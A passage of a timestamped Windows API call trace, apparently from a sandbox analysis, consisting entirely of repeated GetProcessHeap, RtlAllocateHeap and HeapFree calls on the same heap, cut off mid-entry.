[0110.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0110.740] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.741] GetProcessHeap () returned 0xe30000 [0110.741] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.742] GetProcessHeap () returned 0xe30000 [0110.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.743] GetProcessHeap () returned 0xe30000 [0110.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.744] GetProcessHeap () returned 0xe30000 [0110.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.745] GetProcessHeap () returned 0xe30000 [0110.745] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.746] GetProcessHeap () returned 0xe30000 [0110.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.747] GetProcessHeap () returned 0xe30000 [0110.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.747] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0110.748] GetProcessHeap () returned 0xe30000 [0110.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0110.749] GetProcessHeap () returned 0xe30000 [0110.749] HeapFree 